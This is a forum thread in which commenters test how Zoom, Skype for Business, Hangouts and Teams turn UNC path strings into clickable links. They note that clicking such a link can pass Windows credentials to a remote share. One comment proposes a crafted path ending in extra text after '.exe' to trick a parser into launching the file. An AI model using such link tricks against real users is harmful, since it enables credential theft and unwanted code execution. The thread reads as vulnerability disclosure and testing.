You can also do the exact same thing in any messaging app.

I don't think so. Other messaging apps don't parse strings starting with \\ as links and if they do, they hopefully undo it for the .exe extension.

Have you tried that?

Hangouts: \\servername.tld\share doesn't parse as a UNC, instead becomes clickable and brings up a browser to "servername.tld"

Skype for business: Does exactly what Zoom does, turns the entire thing into a clickable link

MS Teams: Doesn't parse as clickable at all

That's all I have in front of me at the moment...

> Does exactly what Zoom does, turns the entire thing into a clickable link

And runs it when you click on it?

Just went and confirmed, in Skype for Business it does not launch the executable but rather opens explorer to the share and highlights the .EXE. So, anyone operating that share will still be passed your creds, but it doesn't launch the executable.

Testing in zoom, it launches the OS prompt to confirm .exe launch. Tested in Windows 10.

Could you try skype with \\servername.tld\path\file.exe\extra.text

There is a good chance it will run file.exe if they cut the end of the string naively. :D

Oh that is an interesting approach...

Skype for business threw an error: "Sorry, we couldn't open the link".

No hyperlink in any reasonably-authored messaging app is both going to download+run an .exe file without confirmation AND send your credentials to the remote server without prompting. It's absurd behavior